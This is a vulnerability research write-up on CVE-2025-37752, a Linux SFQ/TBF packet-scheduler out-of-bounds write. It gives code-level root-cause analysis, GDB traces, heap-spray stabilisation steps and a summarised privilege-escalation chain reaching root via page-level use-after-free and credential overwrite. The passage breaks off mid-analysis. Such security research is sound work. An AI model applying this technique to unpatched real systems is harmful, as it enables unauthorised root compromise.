CVE-2025-37752 is an Array-Out-Of-Bounds vulnerability in the Linux network packet scheduler, specifically in the SFQ queuing discipline. An invalid SFQ limit and a series of interactions between SFQ and the TBF Qdisc can lead to a 0x0000 being written approximately 256KB out of bounds at a misaligned offset. If properly exploited, this can enable privilege escalation.

Overview

SFQ is a classless queueing discipline designed to ensure fair bandwidth distribution among various network data flows.

When utilized as child of a TBF Qdisc, if the SFQ limit is set to one, a series of interactions between the two Qdiscs may lead to an underflow in the sfq_dec() function if the Qdisc qlen is decremented from zero. This can result in a 16bit value being written approximately 256KB out of bounds when the underflowed qlen is used as an index in the sfq_sched_data dep array in sfq_link().

The original crash was triggered by Syzkaller and addressed by Google. However, the initial patch could still be bypassed, allowing the limit to be indirectly set to one. The bug has been fixed by commits 8c0cea59d40cf6dd13c2950437631dd614fbade6 and b3bf8f63e6179076b57c9de660c9f80b5abefe70. The first commit created a temporary area to process the Qdisc parameters, while the second moved the limit check to the end of the function. All kernel versions prior to these commits that have CONFIG_NET_SCH_SFQ and CONFIG_USER_NS enabled are affected.

In this article, after analyzing the vulnerability, we will explore how I went from “This is just a DOS” to “This is impossible to exploit” to ultimately causing a page-UAF that allowed me to compromise all of Google’s kernelCTF instances with the same binary.

TL;DR? Click here
  • Spray sfq_slots in kmalloc-64 to prevent an immediate kernel crash when the bug is triggered.
  • Prevent a type-confused skb from being dequeued by reconfiguring the TBF Qdisc. Drop TBF rate and add packet overhead before the OOB write occurs.
  • Use the 0x0000 written 262636 bytes OOB to corrupt the pipe->files field of a named pipe, free the pipe, cause page-level UAF and get arbitrary R/W in that page.
  • Reclaim the freed page with signalfd files and use the page-level R/W primitive to swap file->private_data with file->f_cred.
  • Get root by overwriting the process credentials with zeros via signalfd4().

Vulnerability Analysis

When a SFQ Qdisc is initialized, sfq_change() is called. Despite an initial check explicitly prohibiting a limit equal to one, the Qdisc limit can still be indirectly set to this value when other Qdisc parameters are updated:

static int sfq_change(struct Qdisc *sch, struct nlattr *opt,
		      struct netlink_ext_ack *extack)
{
	// ...
	
	// Initial check prohibiting limit == 1
	if (ctl->limit == 1) {
		NL_SET_ERR_MSG_MOD(extack, "invalid limit");
		return -EINVAL;
	}
	
	// ...

	if (ctl->flows)
		q->maxflows = min_t(u32, ctl->flows, SFQ_MAX_FLOWS);
	if (ctl->divisor) {
		q->divisor = ctl->divisor;
		q->maxflows = min_t(u32, q->maxflows, q->divisor);
	}
	if (ctl_v1) {
		if (ctl_v1->depth)
			q->maxdepth = min_t(u32, ctl_v1->depth, SFQ_MAX_DEPTH);
		// ...
	}
	if (ctl->limit) {
		// Here if q->maxdepth = 1 and q->maxflows = 1
		// The ctl->limit == 1 check above can be bypassed and q->limit set to 1
		q->limit = min_t(u32, ctl->limit, q->maxdepth * q->maxflows);
		q->maxflows = min_t(u32, q->maxflows, q->limit);
	}
	
	// ...
}

q->limit determines the maximum number of packets in the Qdisc queue. In sfq_enqueue(), when a new packet arrives, if the Qdisc queue length (aka qlen) exceeds this limit, the packet is dropped:

static int
sfq_enqueue(struct sk_buff *skb, struct Qdisc *sch, struct sk_buff **to_free)
{
	// ...

	if (++sch->q.qlen <= q->limit)
		return NET_XMIT_SUCCESS;

	qlen = slot->qlen;
	dropped = sfq_drop(sch, to_free);

	// ...
}

If q->limit is set to one and packets are sent to the network interface in a burst, a complex chain of interactions between TBF and SFQ can lead to multiple bugs, including an array out-of-bounds write vulnerability.

Let’s explore step by step what happens if we send three packets in a burst to a network interface configured as follows:

qdisc tbf 1: root refcnt 2 rate 640bit burst 100b lat 124s 
qdisc sfq 2: parent 1:10 limit 1p quantum 1014b depth 1 divisor 1024

Packet A is sent (skb_A)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen is 0
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_A
                slot->skblist_prev = skb_A
            q->tail = slot
            ++sch->q.qlen // SFQ qlen = 1
            // SFQ qlen <= limit, skb_A is enqueued

tbf_dequeue() is called. Since thesch->gso_skb list is empty, sfq_dequeue() is invoked, and the packet correctly dequeued. SFQ qlen is decremented to 0. So far so good:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen is 1
            slot = q->tail
            slot_dequeue_head()
                skb_A = slot->skblist_next
                slot->skblist_next = slot
                slot->skblist_prev = slot
            sch->q.qlen-- // SFQ qlen = 0
        __skb_queue_head(&sch->gso_skb, skb);
        sch->q.qlen++ // SFQ qlen = 1
    // TBF has enough tokens, so the packet can be dequeued
    qdisc_dequeue_peeked()
        skb_A = __skb_dequeue(&sch->gso_skb)
        sch->q.qlen-- // SFQ qlen = 0

Packet B is sent (skb_B)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). The packet is correctly enqueued, SFQ qlen is incremented to 1:

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen is 0
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_B
                slot->skblist_prev = skb_B
            q->tail = slot
            ++sch->q.qlen // SFQ qlen = 1
            // SFQ qlen <= limit, skb_B is enqueued

tbf_dequeue() is called, which in turn calls sfq_dequeue(). The packet is correctly dequeued from SFQ, but TBF ran out of tokens, so it reschedules itself for later using qdisc_watchdog_schedule_ns(). The SFQ qlen remains 1, as packet B is still considered to be in the queue (it is actually in the gso_skb list):

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen is 1
            slot = q->tail
            slot_dequeue_head()
                skb_B = slot->skblist_next
                slot->skblist_next = slot
                slot->skblist_prev = slot
            sch->q.qlen-- // SFQ qlen = 0
        __skb_queue_head(&sch->gso_skb, skb);
        sch->q.qlen++ // SFQ qlen = 1 
    
    // TBF runs out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()

Packet C is sent (skb_C)

tbf_enqueue() is called, which in turn calls sfq_enqueue(). Packet C is added to the first SFQ slot, q->tail is set to slot, the SFQ qlen incremented from 1 (packet B is still enqueued!) to 2. However, since qlen is now greater than q->limit, the packet is dropped.

sfq_drop() uses slot_dequeue_tail() to remove the packet from the slot. Now the slot->skblist_next and slot->skblist_prev fields, point to the slot itself. Finally, SFQ qlen is decremented to 1:

Notice how q->tail is not NULL at this point, it still corresponds to slot, but now the slot->skblist_next and slot->skblist_prev point to the slot itself rather than to a valid sk_buff.

tbf_enqueue()
    qdisc_enqueue()
        sfq_enqueue() // SFQ qlen = 1
            slot = q->slots[0]
            slot_queue_add()
                slot->skblist_next = skb_C
                slot->skblist_prev = skb_C
            q->tail = slot // [1]
            ++sch->q.qlen // SFQ qlen = 2
            // SFQ qlen > limit, skb_C is dropped
            sfq_drop()
                slot_dequeue_tail()
                    // skb_C removed from the slot
                    slot->skblist_next = slot
                    slot->skblist_prev = slot
                sch->q.qlen-- // SFQ qlen = 1

tbf_dequeue() attempts to dequeue packet B from the sch->gso_skb list, but it is still out of tokens, so it reschedules itself once again:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is _not_ empty (contains Packet B)
    // TBF is still out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()

The first qdisc-watchdog timer fires

Approximately 1 second later (the time depends on the TBF configuration), the Qdisc watchdog timer fires, and tbf_dequeue() is called again. Packet B is removed from the sch->gso_skb list and correctly dequeued. The SFQ qlen is decremented to 0:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is NOT empty
    qdisc_dequeue_peeked()
        skb_B = __skb_dequeue(&sch->gso_skb) // Remove the packet from sch->gso_skb
        sch->q.qlen-- // SFQ qlen = 0

The second qdisc-watchdog timer fires (and things go bad)

The second Qdisc watchdog timer fires, now the sch->gso_skb list is empty, so sfq_dequeue() is called. However, since q->tail is not NULL, slot_dequeue_head() is used to dequeue the skb. The issue arises because slot_dequeue_tail() in sfq_drop() set slot->skblist_next and slot->skblist_prev to the address of the slot itself, so a type confusion bug between a sk_buff and a sfq_slot occurs.

sfq_dec() is then called and the SFQ slot qlen is decremented from zero, resulting in an underflow. The underflowed qlen is subsequently used as an index in the q->dep array (q here is a sfq_sched_data structure), and this is where the out-of-bounds write occurs:

tbf_dequeue()
    qdisc_peek_dequeued()
        skb_peek(&sch->gso_skb) // sch->gso_skb is empty
        sfq_dequeue() // SFQ qlen = 0
            slot = q->tail
            slot_dequeue_head()
                skb = slot->skblist_next // but slot->skblist_next = slot, TYPE CONFUSION!
            sfq_dec()
                q->slots[0].qlen--; // SFQ qlen = 0xFFFF, UNDERFLOW!
                sfq_link()
                    qlen = slot->qlen // 0xFFFF
                    ...
                    q->dep[qlen].next = 0; // 0x0000 written OOB!

    // TBF runs out of tokens, reschedules itself for later
    qdisc_watchdog_schedule_ns()

Interestingly, FizzBuzz101 and I recently discovered a bug that allowed us to crash five different Qdiscs. Initially, we thought the root cause was different, but thanks to the kernel developer Cong Wang, we conducted further analysis and realized it was due to an interaction between the Qdiscs and TBF, very similar to the case described above! The discussion can be found here.

In-Depth Analysis (GDB Time)

Using GDB, we can inspect what happens when the Qdisc watchdog timer fires for the second time and the series of bugs is triggered. By setting a breakpoint at sfq_dequeue(), we can clearly see that after calling slot_dequeue_head(), the returned skb address and the sfq_slot address are the same. A type confusion occurred:

static struct sk_buff *
sfq_dequeue(struct Qdisc *sch)
{
	// ...

	a = q->tail->next; // a = 0
	slot = &q->slots[a]; // first (and only) slot retrieved

	// ...

	skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot!
	sfq_dec(q, a); // OOB write

	// ...
}

static inline struct sk_buff *slot_dequeue_head(struct sfq_slot *slot)
{
	struct sk_buff *skb = slot->skblist_next; // slot->skblist_next == slot, so skb = slot

	slot->skblist_next = skb->next;
	skb->next->prev = (struct sk_buff *)slot;
	skb->next = skb->prev = NULL;
	return skb;
}

If we step into the sfq_dec() function, we can observe how the slot qlen is decremented from 0, causing an underflow (qlen is a u16, so it will become 0xFFFF):

static inline void sfq_dec(struct sfq_sched_data *q, sfq_index x) // x = 0x0000
{
	sfq_index p, n;
	int d;

	// ...
	d = q->slots[x].qlen--; // Underflow, qlen = 0xFFFF
	// ...
	
	sfq_link(q, x);
}

Finally, by stepping into sfq_link(), we can see how the qlen value, now 0xFFFF, is used as an index in the sfq_sched_data dep array. Since this array can hold a maximum of SFQ_MAX_DEPTH + 1 (127 + 1) objects, each 16 bytes in size, the index 0xFFFF will cause an out-of-bounds write:

static inline void sfq_link(struct sfq_sched_data *q, sfq_index x)
{
	sfq_index p, n;
	struct sfq_slot *slot = &q->slots[x];
	int qlen = slot->qlen; // qlen = 0xFFFF

	// ...

	q->dep[qlen].next = x; // 0x0000 written OOB
	sfq_dep_head(q, n)->prev = x;
}

We know the address of sfq_sched_data and the offset of sfq_sched_data (privdata) in the Qdisc structure (0x180 bytes). From this we can derive the address of the current Qdisc object.

Using GDB we can also determine where the 0x0000 is written out of bounds. By subtracting the current object address from this value, we can obtain the distance between the Qdisc object and the victim address:

sfq_sched_data_addr = 0xffff88802e537980
oob_write_addr = 0xffff88802e5779ec
privdata_offset_in_qdisc = 0x180 # sfq_sched_data offset in Qdisc

qdisc_addr = sfq_sched_data_addr - privdata_offset_in_qdisc
distance = oob_write_addr - qdisc_addr

print(hex(distance)) # 0x401EC or 262636 bytes

So we have a 0x0000 written only 262636 bytes after the vulnerable Qdisc object. Things are getting interesting.

This Is Not Exploitable…

At this point, I honestly thought this was impossible to exploit. I also showed the bug and provided a quick explanation to FizzBuzz101, and he agreed. The 256KB+ out-of-bounds write primitive at a misaligned offset (0x1EC) seemed extremely limited, and as if that weren’t enough, the kernel was crashing right after sfq_dec() due to an invalid pointer access. However, I decided to persist and continued with further investigation.

We need to keep in mind that due to the sk_buff/sfq_slot type confusion, the skb returned by slot_dequeue_head() in sfq_dequeue() is not actually a skb, but rather a

Dr. Evil attempting to explain to his crew that the skb is not really an skb

This means that every access to this "skb" translates to an access to a sfq_slot, which can potentially lead to a crash. For instance, the kernel will immediately panic right after the out-of-bounds write in sfq_dec(), due to an invalid pointer access in qdisc_bstats_update(sch, skb):

static struct sk_buff *
sfq_dequeue(struct Qdisc *sch)
{
	// ...

	skb = slot_dequeue_head(slot); // Type confusion, skb is a sfq_slot
	sfq_dec(q, a); // OOB write!
	qdisc_bstats_update(sch, skb); // Kernel panic! :(
	
	// ...
}

But this is not the only problem we need to address if we want to exploit the vulnerability. If the "skb" is dequeued from both SFQ and TBF, it will inevitably lead to a crash when it is processed further.

Stabilization: Addressing The First Kernel Panic In qdisc_bstats_update()

The first kernel crash occurs in qdisc_bstats_update(), right after the sfq_dec() call. qdisc_bstats_update() is defined as follows:

#define skb_shinfo(SKB)	((struct skb_shared_info *)(skb_end_pointer(SKB)))

static inline void qdisc_bstats_update(struct Qdisc *sch,
				       const struct sk_buff *skb)
{
	bstats_update(&sch->bstats, skb);
}

static inline void bstats_update(struct gnet_stats_basic_sync *bstats,
				 const struct sk_buff *skb)
{
	_bstats_update(bstats,
		       qdisc_pkt_len(skb),
		       skb_is_gso(skb) ? skb_shinfo(skb)->gso_segs : 1); // [1]
}

static inline bool skb_is_gso(const struct sk_buff *skb)
{
	return skb_shinfo(skb)->gso_size;
}

static inline unsigned char *skb_end_pointer(const struct sk_buff *skb)
{
	return skb->head + skb->end;
}

The crash is caused by bstats_update(). This function is using skb_is_gso() to access the gso_size field of the skb_shared_info structure associated with the sk_buff.

skb_is_gso() utilizes the macro skb_shinfo(), which uses skb_end_pointer(). This, in turn, relies on the skb->head pointer and skb->end of the sk_buff to determine where the packet data ends and the actual skb_shared_info begins.

Now, offsetof(struct sk_buff, head) = 192, but in our case, the "skb" is actually a sfq_slot, which is allocated in kmalloc-64. Therefore, an access to skb->head at offset 192 translates to an access to the first qword of another object in kmalloc-64, specifically, the first qword of the third object after the "skb". If this qword does not contain a valid pointer, the kernel crashes when the pointer is dereferenced to access ->gso_size.

The slots array is allocated by sfq_init() using sfq_alloc(), a kvmalloc wrapper. Each sfq_slot is 64 bytes in size and the number of slots in the array depends on q->maxflows. Our SFQ configuration only has a single flow, which results in a single slot allocated in kmalloc-64 per Qdisc.

// ...
q->slots = sfq_alloc(sizeof(q->slots[0]) * q->maxflows);
// ...

If we want to prevent the kernel from crashing, we need to populate the kmalloc-64 slab with objects that have a valid pointer as their first qword. Luckily, we don’t need to look too far. When a sfq_slot is initialized, the first and second qwords are set to its own address, so we can fake a valid skb->head pointer by spraying sfq_slot(s) in kmalloc-64.

struct sfq_slot {
	struct sk_buff	*skblist_next;
	struct sk_buff	*skblist_prev;
	// ...
};

static inline void slot_queue_init(struct sfq_slot *slot)
{
	memset(slot, 0, sizeof(*slot));
	slot->skblist_prev = slot->skblist_next = (struct sk_buff *)slot;
}

The offset 192, relative to the type-confused sfq_slot, will correspond to the slot->skblist_next pointer of the third slot after the current one. This will result in the following situation:

This was an easy win. Now let’s address the second kernel panic when the "skb" is dequeued from both SFQ and TBF.

Stabilization: Addressing The Second Kernel Panic In validate_xmit_skb()

After the type confusion and the out-of-bounds write, sfq_dequeue() will return the type-confused "skb" in tbf_dequeue() which in turn will return it in dequeue_skb(). This function will pass the dequeued "skb" to sch_direct_xmit(), which will call validate_xmit_skb_list(). This will lead to a call to validate_xmit_skb(), where the kernel will crash due to another invalid pointer access:

...
    dequeue_skb()
        tbf_dequeue()
           sfq_dequeue()
    sch_direct_xmit()
        validate_xmit_skb_list()
            validate_xmit_skb() // Kernel panic!

Now, I won’t dig too much into it, but having a sk_buff type confused with a sfq_slot wandering around the kernel is not a good idea. Therefore, instead of trying to fake pointers in kmalloc-64 as we did to address the previous crash, we want to tackle the root cause and prevent the packet from being dequeued.

I could not find a way to prevent SFQ from dequeuing the "skb", so I decided to focus on TBF. Here is the tbf_dequeue() function:

static struct sk_buff *tbf_dequeue(struct Qdisc *sch)
{
	struct tbf_sched_data *q = qdisc_priv(sch);
	struct sk_buff *skb;

	skb = q->qdisc->ops->peek(q->qdisc); // "skb" returned by sfq_dequeue()

	if (skb) {
		s64 now;
		s64 toks;
		s64 ptoks = 0;
		unsigned int len = qdisc_pkt_len(skb); // [6]

		now = ktime_get_ns();
		toks = min_t(s64, now - q->t_c, q->buffer);

		// ...

		toks += q->tokens; // [4]
		if (toks > q->buffer)
			toks = q->buffer; // [5]
		toks -= (s64) psched_l2t_ns(&q->rate, len); // [3]

		//  Here we need toks|ptoks to be < 0
		if ((toks|ptoks) >= 0) { // [1]
			skb = qdisc_dequeue_peeked(q->qdisc);
			if (unlikely(!skb))
				return NULL;

			// ...

			return skb;
		}

		qdisc_watchdog_schedule_ns(&q->watchdog,
					   now + max_t(long, -toks, -ptoks)); // [2]

		qdisc_qstats_overlimit(sch);
	}
	return NULL;
}

In tbf_dequeue(), if the amount of remaining tokens is greater than zero, the packet is dequeued [1]. Otherwise the Qdisc reschedules itself for later using qdisc_watchdog_schedule_ns(). [2] In this case, the opposite of the number of tokens corresponds to the number of nanoseconds to wait before rescheduling.

To prevent the packet from being dequeued, we need to solve a min/max problem. We want to minimize toks and maximize the value returned by psched_l2t_ns(), so that when this value is subtracted from toks, we can obtain a negative number (the lower, the better). [3]

This approach looks promising, as we can indirectly minimize toks by controlling q->buffer and q->tokens in tbf_change() [4] [5]. Additionaly, we can (probably) maximize the the "skb" packet length (keep in mind that our skb is a sfq_slot) [6], by controlling sfq_slot field.

Attempt 1: Maximizing “Packet” Length (FAILED)

qdisc_pkt_len() calculates the size of a sk_buff by casting the skb->cb buffer to a qdisc_skb_cb and then accessing the pkt_len field:

static inline unsigned int qdisc_pkt_len(const struct sk_buff *skb)
{
	return qdisc_skb_cb(skb)->pkt_len;
}


static inline struct qdisc_skb_cb *qdisc_skb_cb(const struct sk_buff *skb)
{
	return (struct qdisc_skb_cb *)skb->cb;
}

struct sk_buff {
	// ...
	char	cb[48];		/*    40    48 */
	// ...
}

struct qdisc_skb_cb {
	struct {
		unsigned int	pkt_len;	/*     0     4 */
		// ...
	};
	// ...
};

As we can see, offsetof(struct sk_buff, cb) = 40 and offsetof(struct qdisc_skb_cb, pkt_len) = 0. Now, our "skb" is a sfq_slot, and offset 40 (0x28 in hexadecimal), overlaps (in the Google kernelCTF LTS 6.6.8* instances) with sfq_slot->vars.qcount.

The slot->vars.qcount field, is automatically set to -1 by red_set_vars() when a new packet is enqueued in sfq_enqueue(). So we are fortunate, as when the type-confusion occurs, this will result in a very large packet size, 0xFFFFFFFF.

However, our luck did not last very long. The memory alignment of the sfq_slot structure differs from system to system. In Google COS 105, and generally for systems before Linux 6.6.8*, skb->cb.pkt_size overlaps with slot->vars.qavg.

LTS 6.6.84 (Google kernelCTF VRP) COS 105 (Google kernelCTF VRP)
gef  ptype /ox struct sfq_slot
/* offset      |    size */  type = struct sfq_slot {
...
/* XXX  4-byte hole      */
/* 0x0028      |  0x0018 */    struct red_vars {
/* 0x0028      |  0x0004 */        int qcount;
/* 0x002c      |  0x0004 */        u32 qR;
/* 0x0030      |  0x0008 */        unsigned long qavg;
/* 0x0038      |  0x0008 */        ktime_t qidlestart;
                               } vars;
...
gef  ptype /ox struct sfq_slot
/* offset      |    size */  type = struct sfq_slot {
...
/* 0x0020      |  0x0018 */    struct red_vars {
/* 0x0020      |  0x0004 */        int qcount;
/* 0x0024      |  0x0004 */        u32 qR;
/* 0x0028      |  0x0008 */        unsigned long qavg;
/* 0x0030      |  0x0008 */        ktime_t qidlestart;
                               } vars;

...